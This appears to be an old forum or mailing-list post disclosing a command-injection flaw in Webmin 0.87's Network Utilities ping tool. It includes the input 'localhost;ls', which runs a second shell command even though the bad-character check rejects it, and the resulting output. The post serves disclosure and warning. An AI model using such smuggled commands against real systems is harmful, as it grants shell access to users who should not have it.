In webmin 0.87 (and earlier no doubt) on my Mandrake
7.2 box (all operating systems probably), under
'Networking', 'Network Utilities'
there is a 'handy ping, traceroute, nmap etc.' window.
The hostname input is validated by the standard 'bad
character' check, which complains (in large red text)
if I enter a ';', but the text is passed to shell
I entered 'localhost;ls' as the hostname and clicked
'Ping', here's the output...
[ Network Utilities 0.80.1 ]
Running the ping
Host name localhost;ls contains bad characters. Please
correct and try again.
ping -c 5 -s 56 localhost;ls 2>&1
PING localhost (127.0.0.1): 56 octets data
64 octets from 127.0.0.1: icmp_seq=0 ttl=255 time=0.1
64 octets from 127.0.0.1: icmp_seq=1 ttl=255 time=0.1
64 octets from 127.0.0.1: icmp_seq=2 ttl=255 time=0.1
64 octets from 127.0.0.1: icmp_seq=3 ttl=255 time=0.1
64 octets from 127.0.0.1: icmp_seq=4 ttl=255 time=0.1
--- localhost ping statistics ---
5 packets transmitted, 5 packets received, 0% packet
round-trip min/avg/max = 0.1/0.1/0.1 ms
Not so good.
I assume a simple logic error allowed the command to
run despite the check failing. I hope its not a
cut-and-paster to other places in the code - I haven't
This is a big issue if you allow webmin access to users
who shouldn't have shell access (its not an issue if
you've given them telnet,ssh or 'command' access in
webmin). Samples include operators and help desk type
users who typically have a restricted set of functions
Log in to post a comment.